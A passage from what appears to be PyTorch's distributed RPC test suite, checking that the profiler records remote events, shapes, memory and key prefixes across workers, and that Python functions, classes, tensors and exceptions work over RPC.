        self.assertTrue(rpc_exec_mode.value in rpc_event.name)
        self.assertEqual(rpc_event.count, 1)
    @dist_init
    def test_profiler_rpc_record_shapes(self):
        """Remote aten::add input shapes in the profile match a local run's."""
        # Only rank 1 drives this test; other ranks just serve the RPC.
        if self.rank != 1:
            return
        dst = (self.rank + 1) % self.world_size
        dst_worker = worker_name(dst)
        t1, t2 = torch.ones(100), torch.ones(100)
        with _profile(record_shapes=True) as prof:
            rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))
        function_events = prof.function_events
        remote_events = [event for event in function_events if event.is_remote]
        remote_add_event = [
            event for event in remote_events if "aten::add" in event.name
        ][0]
        remote_add_input_shapes = remote_add_event.input_shapes
        # Run profiler on equivalent local op and validate shapes are the same.
        with _profile(record_shapes=True) as prof:
            torch.add(t1, t2)
        local_function_events = prof.function_events
        local_add_event = [
            event for event in local_function_events if "aten::add" in event.name
        ][0]
        local_add_input_shapes = local_add_event.input_shapes
        self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
    @dist_init
    def test_profiler_rpc_memory(self):
        """CPU memory usage profiled on the callee is propagated back over the
        wire when (and only when) profile_memory=True."""
        if self.rank != 1:
            return
        dst = (self.rank + 1) % self.world_size
        dst_worker = worker_name(dst)
        with _profile(profile_memory=True) as p:
            fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
            res = fut.wait()
        function_events = p.function_events
        event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
        # if cpu_memory_usage was not propagated over the wire, this set would
        # only contain 0 (indicates no memory being profiled)
        self.assertNotEqual({0}, event_cpu_mem_usages)
        # No memory profiled if profile_memory=False
        with _profile(profile_memory=False) as p:
            fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
            res = fut.wait()
        function_events = p.function_events
        event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
        self.assertEqual({0}, event_cpu_mem_usages)
    @dist_init
    def test_profiler_export_trace(self):
        """An exported chrome trace must contain the expected remote events and
        the async-RPC event name."""
        if self.rank != 1:
            return
        dst = (self.rank + 1) % self.world_size
        dst_worker = worker_name(dst)
        with _profile() as p:
            fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
            res = fut.wait()
        events = p.function_events
        with TemporaryFileName() as fname:
            path = fname
            p.export_chrome_trace(path)
            with open(path) as f:
                trace = json.load(f)
                event_names = [event['name'] for event in trace]
                for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
                    event_exists = any([expected_event_name in event_name for event_name in event_names])
                    self.assertTrue(event_exists)
    @dist_init
    def test_profiler_rpc_key_names(self):
        """Remote events must be prefixed with the RPC profiling key, even when
        several RPCs are profiled concurrently from different threads."""
        # tests that remote events are properly prefixed with the RPC profiling key.
        if self.rank != 1:
            return
        # Spawn multiple threads that send RPCs to ensure keys are correctly
        # prefixed when there are multiple RPCs being created/in flight at the
        # same time.
        dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
        def rpc_with_profiling(dst_worker):
            # Runs one profiled async RPC and validates the prefix of every
            # remote event captured by the local profiler.
            with _profile() as prof:
                fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
                fut.wait()
            events = prof.function_events
            remote_event_names = {
                event.name: event for event in events if event.is_remote
            }
            rpc_profiling_key = _build_rpc_profiling_key(
                RPCExecMode.ASYNC,
                udf_with_torch_ops.__qualname__,
                worker_name(self.rank),
                dst_worker,
            )
            remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
            for name, event in remote_event_names.items():
                # Ensure that we have the expected key as part of the remote
                # event.
                self.assertTrue(name.startswith(rpc_profiling_key))
                self.assertTrue(event.is_remote)
                self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
                # Ensure that the remote event name also contains the operator.
                operator_name_substr = name[len(rpc_profiling_key) :]
                # Note: we don't assert that every remote event needs to be
                # in the above set, the set is just a representative set of
                # what we expect to see. The profiler can change and add more
                # events, but we should always expect to see this representative
                # set.
                matching_event = {
                    remote_event_name
                    for remote_event_name in remote_event_name_set
                    if remote_event_name in operator_name_substr
                }
                remote_event_name_set -= matching_event
            # The set should be empty, otherwise its contained elements did
            # not show up in the remote profiler output.
            self.assertTrue(
                remote_event_name_set == set(),
                f"Expected {remote_event_name_set} to be included in remote profiler output.",
            )
        for dst in dst_ranks:
            dst_worker = worker_name(dst)
            num_parallel_rpcs = 2
            with concurrent.futures.ThreadPoolExecutor(
                max_workers=num_parallel_rpcs
            ) as executor:
                futs = [
                    executor.submit(rpc_with_profiling, dst_worker)
                    for _ in range(num_parallel_rpcs)
                ]
                # Wait for workers to finish test
                for fut in futs:
                    fut.result()
    def _run_test_profiler_remote_events_profiled(self):
        """Invoke the profiler around an RPC to each peer and check the remote
        events collected back into the local profiler."""
        # Tests that we can successfully invoke the profiler on a remote node,
        # and collect the remote events back in the local profiler.
        if self.rank != 1:
            return
        dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
        for dst in dst_ranks:
            dst_worker = worker_name(dst)
            with _profile() as prof:
                fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
                ret = fut.wait()
            events = prof.function_events
            rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
            self.check_profiling_info(
                worker_name(self.rank),
                dst_worker,
                udf_with_torch_ops,
                rpc_event,
                RPCExecMode.ASYNC,
            )
            remote_events = {event.name: event for event in events if event.is_remote}
            rpc_profiling_key = _build_rpc_profiling_key(
                RPCExecMode.ASYNC,
                udf_with_torch_ops.__qualname__,
                worker_name(self.rank),
                worker_name(dst),
            )
            for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
                expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
                self.assertTrue(expected_key in remote_events)
                remote_event = remote_events[expected_key]
                # Remote event should have a node ID corresponding to the worker
                # it ran on.
                self.assertEqual(remote_event.node_id, dst)
            # Validate order remote events show up in profiling output.
            def convert_remote_to_local(event_name):
                # Strip the profiling-key prefix to recover the local op name.
                remote_op_key = rpc_profiling_key + REMOTE_OP_STR
                return event_name[
                    event_name.find(remote_op_key)
                    + len(remote_op_key) :
                ]
            remote_events_list = [
                convert_remote_to_local(event.name)
                for event in events
                if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
            ]
            self.assertEqual(
                set(remote_events_list),
                set(EXPECTED_REMOTE_EVENTS),
                f"Mismatch between profiled events: {set(remote_events_list)} and expected events: {set(EXPECTED_REMOTE_EVENTS)}",
            )
    @dist_init
    def test_profiler_remote_events_profiled(self):
        """Run the shared remote-events-profiled check."""
        self._run_test_profiler_remote_events_profiled()
    @dist_init
    def test_profiler_remote_events_profiled_single_threaded(self):
        """Run the shared remote-events-profiled check (single-threaded variant)."""
        self._run_test_profiler_remote_events_profiled()
def run_profiling_workload(self, dst):
fut = rpc.rpc_async(
worker_name(dst),
torch.mul,
args=(
torch.tensor(1.0, requires_grad=True),
torch.tensor(1.0, requires_grad=True),
),
)
fut.wait()
    def _run_rpc_profiling_async_function(self, device="cpu"):
        """Profile a nested async-function RPC chain (this rank -> dst1 -> dst2)
        and check both the nested RPC event and the remote add event are
        attributed to the correct nodes."""
        if self.rank != 1:
            return
        dst1 = worker_name((self.rank + 1) % self.world_size)
        dst2 = worker_name((self.rank + 2) % self.world_size)
        x = torch.ones(2)
        y = torch.ones(2)
        with _profile() as prof:
            ret = rpc.rpc_async(
                dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
            )
            out = ret.wait()
        function_events = prof.function_events
        # slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
        # recorded.
        key_prefix = _build_rpc_profiling_key(
            RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
        )
        nested_rpc_key_prefix = _build_rpc_profiling_key(
            RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
        )
        expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
        remote_events = [event for event in function_events if event.is_remote]
        rpc_remote_event = [
            event for event in remote_events if event.name == expected_key
        ]
        self.assertEqual(1, len(rpc_remote_event))
        rpc_remote_event = rpc_remote_event[0]
        self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
        # slow_async_add's RPC does an add on dst2, which should be reflected as well.
        remote_add_key = (
            expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
        )
        remote_add_event = [
            event for event in remote_events if event.name == remote_add_key
        ]
        self.assertEqual(1, len(remote_add_event))
        remote_add_event = remote_add_event[0]
        # Validate that node_id is dst2.
        self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
    @dist_init
    def test_rpc_profiling_async_function(self):
        """Profile nested async-function RPCs on CPU, and on CUDA when available."""
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        self._run_rpc_profiling_async_function()
        if torch.cuda.is_available():
            dist.barrier()
            self._run_rpc_profiling_async_function(device="cuda:0")
    @dist_init
    def test_rpc_profiling_async_function_single_threaded(self):
        """Single-threaded variant of the async-function profiling test."""
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        self._run_rpc_profiling_async_function()
        if torch.cuda.is_available():
            dist.barrier()
            self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
# test that functions run over RPC with record_function show the expected
# profiled block.
if self.rank != 1:
return
dst_ranks = [i for i in range(self.world_size) if i != self.rank]
for dst_rank in dst_ranks:
dst_worker = worker_name(dst_rank)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
fut.wait()
function_events = prof.function_events
record_function_remote_event = [
evt for evt in function_events if "##forward##" in evt.name
]
self.assertEqual(1, len(record_function_remote_event))
record_function_remote_event = record_function_remote_event[0]
self.assertEqual(record_function_remote_event.node_id, dst_rank)
# cpu_children only returns direct children, so here we get all
# children recursively.
def get_cpu_children(event):
if not event.cpu_children:
return []
cpu_children = event.cpu_children
for e in event.cpu_children:
cpu_children.extend(get_cpu_children(e))
return cpu_children
remote_children = get_cpu_children(record_function_remote_event)
# Get local children and verify parity.
with _profile() as prof:
udf_with_torch_ops(-1, True)
local_function_events = prof.function_events
local_record_function_event = [
evt for evt in local_function_events if "##forward##" in evt.name
][0]
local_children = get_cpu_children(local_record_function_event)
local_children_names = [
evt.name for evt in local_children
]
REMOTE_OP_STR = "#remote_op: "
def convert_remote_to_local(event_name):
remote_op_key = REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key) + len(remote_op_key) :
]
for evt in remote_children:
local_name = convert_remote_to_local(evt.name)
self.assertTrue(local_name in local_children_names)
def validate_profiling_workload(self, dst, prof):
def convert_remote_to_local(event_name):
return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]
events = prof.function_events
remote_events = {
convert_remote_to_local(event.name): event
for event in events
if event.is_remote
}
self.assertTrue("aten::mul" in remote_events)
remote_mul_event = remote_events["aten::mul"]
self.assertEqual(remote_mul_event.node_id, dst)
self.check_profiling_info(
worker_name(self.rank),
worker_name(dst),
torch.mul,
remote_mul_event,
RPCExecMode.ASYNC,
)
    def _run_test_profiler_with_autograd_context(self):
        """Profile an RPC workload with the profiler and dist_autograd context
        nested in both orders."""
        dst = (self.rank + 1) % self.world_size
        if self.rank == 1:
            # Cases where we can double wrap messages with profiling information and autograd info.
            with dist_autograd.context() as context_id:
                with _profile() as prof:
                    self.run_profiling_workload(dst)
            self.validate_profiling_workload(dst, prof)
            # Ensure that flipped order of ctx managers results in events being
            # recorded as expected.
            with _profile() as prof:
                with dist_autograd.context() as context_id:
                    self.run_profiling_workload(dst)
            self.validate_profiling_workload(dst, prof)
    @dist_init
    def test_profiler_with_autograd_context_single_threaded(self):
        """Single-threaded variant of the profiler + autograd-context test."""
        self._run_test_profiler_with_autograd_context()
    @dist_init
    def test_profiler_with_autograd_context(self):
        """Run the shared profiler + autograd-context check."""
        self._run_test_profiler_with_autograd_context()
    def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
        """Profile one RPC of the given mode and validate the captured events.

        Args:
            rpc_exec_mode: one of RPCExecMode.SYNC/ASYNC/REMOTE.
            func: the callable to run remotely.
            args: positional args for ``func``.
            use_record_function: wrap the call in a ``record_function("foo")``
                scope and additionally validate scope nesting/ordering.
            dst: destination rank; defaults to the next rank.
        """
        dst = dst if dst is not None else (self.rank + 1) % self.world_size
        # only run profiler on rank 1.
        if self.rank == 1:
            with _profile() as prof:
                record_function_ctx_mgr = (
                    contextlib.suppress()
                    if not use_record_function
                    else torch.autograd.profiler.record_function(
                        "foo"
                    )
                )
                with record_function_ctx_mgr as rf:
                    if rpc_exec_mode == RPCExecMode.SYNC:
                        rpc.rpc_sync(worker_name(dst), func, args=args)
                    elif rpc_exec_mode == RPCExecMode.ASYNC:
                        fut = rpc.rpc_async(worker_name(dst), func, args=args)
                        fut.wait()
                    else:
                        self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
                        rref = rpc.remote(worker_name(dst), func, args=args)
                        rref.to_here()
                        # To avoid flakiness, wait for the RRef to be profiled. This
                        # means that we received the acknowledgement of successful
                        # creation on the owner and ran the callbacks responsible
                        # for recording the profiling event.
                        rref._get_profiling_future().wait()
            events = prof.function_events
            rpc_event = get_function_event(events, rpc_exec_mode.value)
            # verify Node ID for this rpc event.
            self.assertEqual(rpc_event.node_id, self.rank)
            # Ensure recording of remote events.
            remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
            self.assertGreaterEqual(len(remote_events), 1)
            for remote_event in remote_events:
                self.assertEqual(remote_event.node_id, dst)
            if use_record_function:
                scope_event = get_function_event(events, "foo")
                # Since RPC call is within the scope, its CPU interval should be
                # contained within foo's interval.
                self.assertLessEqual(scope_event.time_range.start, rpc_event.time_range.start)
                self.assertGreaterEqual(scope_event.time_range.end, rpc_event.time_range.end)
            # the sender, dest worker, function run, and type of RPC should all
            # be recorded.
            self_worker_name = worker_name(self.rank)
            dst_worker_name = worker_name(dst)
            self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
            if use_record_function:
                # verify order by ensuring that the outer context comes
                # before the rpc event.
                foo_event_ix = next(i for i, event in enumerate(events) if "foo" in event.name)
                rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
                self.assertLess(foo_event_ix, rpc_event_idx)
    def _run_test_profiler_with_sync_rpc_udf(self):
        """Profile a sync RPC running a Python UDF, with and without a
        record_function scope."""
        self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
        self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
                                     use_record_function=True)
    @dist_init
    def test_profiler_with_sync_rpc_udf(self):
        """Run the shared sync-RPC UDF profiling check."""
        self._run_test_profiler_with_sync_rpc_udf()
    @dist_init
    def test_profiler_with_sync_rpc_udf_single_threaded(self):
        """Single-threaded variant of the sync-RPC UDF profiling check."""
        self._run_test_profiler_with_sync_rpc_udf()
    def _run_test_profiler_with_sync_rpc_builtin(self):
        """Profile a sync RPC running a builtin op, with and without a
        record_function scope."""
        self._profiler_test_with_rpc(
            RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
        )
        self._profiler_test_with_rpc(
            RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
            use_record_function=True
        )
    @dist_init
    def test_profiler_with_sync_rpc_builtin(self):
        """Run the shared sync-RPC builtin profiling check."""
        self._run_test_profiler_with_sync_rpc_builtin()
    @dist_init
    def test_profiler_with_sync_rpc_builtin_single_threaded(self):
        """Single-threaded variant of the sync-RPC builtin profiling check."""
        self._run_test_profiler_with_sync_rpc_builtin()
    def _run_test_profiler_with_async_rpc_udf(self):
        """Profile an async RPC running a Python UDF, with and without a
        record_function scope."""
        self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
        self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
                                     use_record_function=True)
    @dist_init
    def test_profiler_with_async_rpc_udf(self):
        """Run the shared async-RPC UDF profiling check."""
        self._run_test_profiler_with_async_rpc_udf()
    @dist_init
    def test_profiler_with_async_rpc_udf_single_threaded(self):
        """Single-threaded variant of the async-RPC UDF profiling check."""
        self._run_test_profiler_with_async_rpc_udf()
    def _run_test_profiler_with_async_rpc_builtin(self):
        """Profile an async RPC running a builtin op, with and without a
        record_function scope."""
        self._profiler_test_with_rpc(
            RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
        )
        self._profiler_test_with_rpc(
            RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
            use_record_function=True
        )
    @dist_init
    def test_profiler_with_async_rpc_builtin(self):
        """Run the shared async-RPC builtin profiling check."""
        self._run_test_profiler_with_async_rpc_builtin()
    @dist_init
    def test_profiler_with_async_rpc_builtin_single_threaded(self):
        """Single-threaded variant of the async-RPC builtin profiling check."""
        self._run_test_profiler_with_async_rpc_builtin()
    def _run_test_profiler_with_remote_udf(self):
        """Profile a remote() call running a Python UDF: plain, inside a
        record_function scope, and remote-to-self."""
        self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
        self._profiler_test_with_rpc(
            RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
        )
        # test remote to self
        self._profiler_test_with_rpc(
            RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
        )
    @dist_init
    def test_profiler_with_remote_udf(self):
        """Run the shared remote-UDF profiling check."""
        self._run_test_profiler_with_remote_udf()
    @dist_init
    def test_profiler_with_remote_udf_single_threaded(self):
        """Single-threaded variant of the remote-UDF profiling check."""
        self._run_test_profiler_with_remote_udf()
    def _run_test_profiler_with_remote_builtin(self):
        """Profile a remote() call running a builtin op: plain, inside a
        record_function scope, and remote-to-self."""
        self._profiler_test_with_rpc(
            RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
        )
        self._profiler_test_with_rpc(
            RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
            use_record_function=True
        )
        # test remote to self
        self._profiler_test_with_rpc(
            RPCExecMode.REMOTE,
            torch.mul,
            args=(torch.ones(1), torch.ones(1)),
            dst=self.rank,
        )
    @dist_init
    def test_profiler_with_remote_builtin(self):
        """Run the shared remote-builtin profiling check."""
        self._run_test_profiler_with_remote_builtin()
    @dist_init
    def test_profiler_with_remote_builtin_single_threaded(self):
        """Single-threaded variant of the remote-builtin profiling check."""
        self._run_test_profiler_with_remote_builtin()
    def _run_test_profiler_with_script_async_rpc(self):
        """Profile an async RPC running a TorchScript function, with and
        without a record_function scope."""
        self._profiler_test_with_rpc(
            RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
        )
        self._profiler_test_with_rpc(
            RPCExecMode.ASYNC,
            my_script_func,
            args=(torch.tensor(1),),
            use_record_function=True,
        )
    @dist_init
    def test_profiler_with_script_async_rpc(self):
        """Run the shared TorchScript async-RPC profiling check."""
        self._run_test_profiler_with_script_async_rpc()
    @dist_init
    def test_profiler_with_script_async_rpc_single_threaded(self):
        """Single-threaded variant of the TorchScript async-RPC profiling check."""
        self._run_test_profiler_with_script_async_rpc()
    def _run_test_profiler_with_script_sync_rpc(self):
        """Profile a sync RPC running a TorchScript function, with and without
        a record_function scope."""
        self._profiler_test_with_rpc(
            RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
        )
        self._profiler_test_with_rpc(
            RPCExecMode.SYNC,
            my_script_func,
            args=(torch.tensor(1),),
            use_record_function=True,
        )
    @dist_init
    def test_profiler_with_script_sync_rpc(self):
        """Run the shared TorchScript sync-RPC profiling check."""
        self._run_test_profiler_with_script_sync_rpc()
    @dist_init
    def test_profiler_with_script_sync_rpc_single_threaded(self):
        """Single-threaded variant of the TorchScript sync-RPC profiling check."""
        self._run_test_profiler_with_script_sync_rpc()
    def _run_test_profiler_with_script_remote_rpc(self):
        """Profile a remote() call running a TorchScript function: plain,
        inside a record_function scope, and remote-to-self."""
        self._profiler_test_with_rpc(
            RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
        )
        self._profiler_test_with_rpc(
            RPCExecMode.REMOTE,
            my_script_func,
            args=(torch.tensor(1),),
            use_record_function=True,
        )
        # test remote to self
        self._profiler_test_with_rpc(
            RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
        )
    @dist_init
    def test_profiler_with_script_remote_rpc(self):
        """Run the shared TorchScript remote-RPC profiling check."""
        self._run_test_profiler_with_script_remote_rpc()
    @dist_init
    def test_profiler_with_script_remote_rpc_single_threaded(self):
        """Single-threaded variant of the TorchScript remote-RPC profiling check."""
        self._run_test_profiler_with_script_remote_rpc()
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
top_level_event_names = []
for thread_local_events in process_global_events:
# Get top-level events from all events happened on a thread.
last_end_time = 0
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
top_level_event_names = sorted(top_level_event_names)
expected_top_level_event_names = sorted(expected_top_level_event_names)
self.assertEqual(
top_level_event_names,
expected_top_level_event_names,
f"Expected events {expected_top_level_event_names}, but got {top_level_event_names}",
)
    @dist_init
    def test_server_process_global_profiler(self):
        """Nested server-side process-global profilers must each capture the
        ops that ran while they were active (inner: sub; outer: sub and add)."""
        if self.rank != 0:
            return
        dst_rank = (self.rank + 1) % self.world_size
        dst_worker_name = worker_name(dst_rank)
        x = torch.tensor(1)
        y = torch.tensor(2)
        outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
        outer_profile_rref.rpc_sync().__enter__()
        rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
        inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
        inner_profile_rref.rpc_sync().__enter__()
        rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
        inner_profile_rref.rpc_sync().__exit__(None, None, None)
        outer_profile_rref.rpc_sync().__exit__(None, None, None)
        inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
        expected_inner_events = ['aten::sub']
        expected_outer_events = expected_inner_events + ['aten::add']
        self._assert_top_level_events(inner_events, expected_inner_events)
        outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
        self._assert_top_level_events(outer_events, expected_outer_events)
        inner_profile_rref.rpc_sync().key_averages()
        outer_profile_rref.rpc_sync().key_averages()
    @dist_init
    def test_async_record_function_double_end_callbacks(self):
        """Calling _call_end_callbacks_on_future twice on the same
        record_function scope must raise RuntimeError."""
        num_sleep_seconds = 1
        if self.rank == 1:
            # Validate that calling the function twice results in an error.
            with _profile() as pf:
                with torch.autograd.profiler.record_function("foo") as rf:
                    fut = rpc.rpc_async(
                        worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
                    )
                    rf._call_end_callbacks_on_future(fut)
                    with self.assertRaisesRegex(
                        RuntimeError, "can only be called once."
                    ):
                        rf._call_end_callbacks_on_future(fut)
                fut.wait()
@dist_init
def test_async_record_function_double_end_callbacks_new_signatures(self):
# Test the new _record_function ops work
# Note: Remove once record_function uses these directly
num_sleep_seconds = 1
if self.rank == 1:
with _profile() as pf:
try:
record = torch.ops.profiler._record_function_enter_new("foo", None)
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
torch.ops.profiler._call_end_callbacks_on_jit_fut(record, fut)
finally:
torch.ops.profiler._record_function_exit(record)
fut.wait()
    @dist_init
    def test_async_record_function_cbs_jit_call(self):
        """The profiling future returned by _call_end_callbacks_on_jit_fut must
        resolve to the RPC's own result, and the event must be recorded."""
        if self.rank == 1:
            with _profile() as pf:
                key = _build_rpc_profiling_key(
                    RPCExecMode.ASYNC,
                    torch._jit_internal._qualified_name(my_script_func),
                    "worker1",
                    "worker0",
                )
                with torch.autograd.profiler.record_function(key) as rf:
                    fut = rpc.rpc_async(
                        worker_name(0), my_script_func, args=(torch.tensor(1),)
                    )
                    # Intentionally calling record_function internals
                    fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
                result = fut.wait()
                # Validate that the profiling future returns the same value as the RPC
                # future.
                expected = torch.add(torch.tensor(1), torch.tensor(1))
                self.assertEqual(result, expected)
            events = pf.function_events
            rpc_event = get_function_event(
                events, torch._jit_internal._qualified_name(my_script_func)
            )
            self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
    @dist_init
    def test_py_class_constructor(self):
        """A class can be the RPC target; the constructed instance is returned."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        ret = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
        self.assertEqual(ret.a, n)
    @dist_init
    def test_py_class_instance_method(self):
        """Bound instance methods can be invoked over RPC."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        ret = rpc.rpc_sync(
            worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
        )
        self.assertEqual(ret, MyClass(2).my_instance_method(n))
    @dist_init
    def test_py_class_method(self):
        """Class methods can be invoked over RPC."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        ret = rpc.rpc_sync(
            worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
        )
        self.assertEqual(ret, MyClass.my_class_method(n, n + 1))
    @dist_init
    def test_py_class_static_method(self):
        """Static methods can be invoked over RPC."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        ret = rpc.rpc_sync(
            worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
        )
        self.assertEqual(ret, MyClass.my_static_method(n + 10))
    @dist_init
    def test_py_multi_async_call(self):
        """Multiple concurrent async RPCs to the same WorkerInfo resolve
        independently to the expected values."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
        fut1 = rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,))
        fut2 = rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2))
        self.assertEqual(fut1.wait(), MyClass.my_static_method(n + 10))
        self.assertEqual(fut2.wait(), min(n, n + 1, n + 2))
    @dist_init
    def test_py_no_return_result(self):
        """A UDF that returns nothing yields the same result over RPC (None)."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
        self.assertEqual(ret, no_result())
    @dist_init
    def test_py_tensors(self):
        """Tensor arguments and returns round-trip correctly through RPC."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        ret = rpc.rpc_sync(
            worker_name(dst_rank),
            my_tensor_function,
            args=(torch.ones(n, n), torch.ones(n, n)),
        )
        self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
futs = []
n = self.rank + 1
dst_rank = n % self.world_size
for i in range(100):
fut = rpc.rpc_async(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(i, i), torch.ones(i, i)),
)
futs.append(fut)
j = 0
for val in torch.futures.wait_all(futs):
self.assertEqual(
val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
)
j += 1
    @dist_init
    def test_py_tensors_in_container(self):
        """Tensors nested inside lists, user classes, and dicts serialize
        correctly over RPC."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        a = [torch.ones(n, n), torch.ones(n, n)]
        b = TensorClass(build_complex_tensors())
        c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
        ret = rpc.rpc_sync(
            worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
        )
        self.assertEqual(ret, my_complex_tensor_function(a, b, c))
    @dist_init
    def test_py_nested_pickle(self):
        """A UDF whose execution pickles further user objects works over RPC."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        ret = rpc.rpc_sync(
            worker_name(dst_rank),
            run_nested_pickle,
            args=(MyPickleClass(), torch.ones(2, 2)),
        )
        m = MyPickleClass()
        m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
        self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
    @dist_init
    def test_py_function_exception(self):
        """A TypeError raised on the callee (bad arguments) propagates to the
        caller."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        with self.assertRaises(TypeError):
            ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))
    @dist_init
    def test_py_raise_in_user_func(self):
        """An exception raised in the remote UDF surfaces on wait() and is
        also logged to stderr on the callee."""
        with captured_output() as (_, err):
            # This barrier prevents a race condition where the main thread has
            # not entered the context manager when the remote function runs.
            initialize_pg(self.file_init_method, self.rank, self.world_size)
            dist.barrier()
            n = self.rank + 1
            dst_rank = n % self.world_size
            fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
            with self.assertRaisesRegex(ValueError, expected_err):
                fut.wait()
            # This barrier prevents a race condition where the main thread exits
            # context manager before the remote function has ran.
            dist.barrier()
        # Validate that trainers log errors when running functions.
        stderr_lines = err.getvalue()
        self.assertTrue(expected_err in stderr_lines)
    @dist_init
    def test_py_raise_in_user_func_escaped_str(self):
        """Escaped characters in a remote error string are unescaped in the
        surfaced exception message."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
        try:
            fut.wait()
        except ValueError as e:
            msg = str(e)
            # Ensure newlines are unescaped to provide a better repr of error.
            self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
        else:
            self.assertTrue(False, "expected raise_func_escape to raise ValueError.")
    @dist_init
    def test_nested_rpc(self):
